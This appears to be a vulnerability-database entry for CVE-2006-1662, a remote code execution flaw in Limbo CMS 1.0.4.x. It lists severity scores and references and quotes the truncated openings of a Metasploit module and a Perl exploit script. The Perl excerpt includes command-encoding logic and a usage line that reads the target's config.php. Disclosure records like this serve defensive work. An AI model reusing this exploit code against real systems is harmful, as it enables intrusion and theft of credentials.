CVE-2006-1662
Published 2006-04-07
CVE-2006-1662: The frontpage option in Limbo CMS 1.0.4.2 and 1.0.4.1 allows remote attackers to execute arbitrary PHP commands via the Itemid parameter in index.php.
Priority P340 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 3.28% (86.9th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| limbo_cms | limbo_cms | — | — |
| limbo_cms | limbo_cms | — | — |
No detection rules found.
Exploit-DB
Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution (Metasploit)
exploitdb·2006-03-07
---
```perl
##
# Title: Limbo CMS version 1.x suffers from a remote code execution vulnerability.
# Name: limbo_cms_1_x.pm
# License: Artistic/BSD/GPL
# Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
# - This is an exploit module for the Metasploit Framework, please see
# http://metasploit.com/projects/Framework for more information.
##
package Msf::Exploit::limbo_cms_1_x;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
my $advanced = { };
my $info = {
    'Name' => 'Limbo CMS version 1.x Code Execution',
    'Version' => '$Revision: 1.1 $',
    'Authors' => [ 'sirh0t ' ],
    'Arch' => [ ],
    'OS' => [ ],
    'Priv' => 0,
    'UserOpts' =>
    {
        'RHOST' => [1, 'ADDR', 'The target addr
```
Exploit-DB
Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution
exploitdb·2006-03-01
---
```perl
#!/usr/bin/perl
##
## Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit
## Bug Discovered by: Coloss / Epsilon (advance1[at]gmail.com) http://coded.altervista.org/limbophp.pl
## /str0ke (milw0rm.com)
use LWP::Simple;
$serv = $ARGV[0];
$path = $ARGV[1];
$command = $ARGV[2];
$cmd = "echo start_er;".
       "$command;".
       "echo end_er";
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
sub usage
{
    print "Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit /str0ke (milw0rm.com)";
    print "Usage: $0 www.example.com /directory/ \"cat config.php\"\n";
    print "sever - URL\n";
    print "path - path to limbo\n";
    print "command - command to execute\n";
    exit ();
}
sub exploit
{
    print qq(Limbo CMS <= 1.0.4.2 (ItemID) Re
```
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0728.html
http://securityreason.com/securityalert/519
http://www.securityfocus.com/archive/1/426428
http://www.securityfocus.com/archive/1/429946/100/0/threaded
http://www.securityfocus.com/bid/16902
https://exchange.xforce.ibmcloud.com/vulnerabilities/24992
Published: 2006-04-07